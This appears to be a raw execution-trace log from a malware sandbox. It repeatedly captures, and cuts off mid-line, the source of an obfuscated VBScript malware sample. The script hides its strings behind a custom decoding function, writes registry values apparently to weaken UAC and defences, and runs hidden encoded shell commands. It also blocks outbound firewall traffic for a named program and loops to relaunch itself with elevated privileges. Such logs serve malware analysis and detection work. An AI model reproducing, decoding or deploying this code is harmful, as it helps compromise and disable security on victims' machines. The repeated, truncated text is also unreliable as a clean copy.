CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.933] wcsncmp (_String1="1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.933] wcsncmp (_String1=")\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.933] wcsncmp (_String1="\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.933] wcsncmp (_String1="\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = 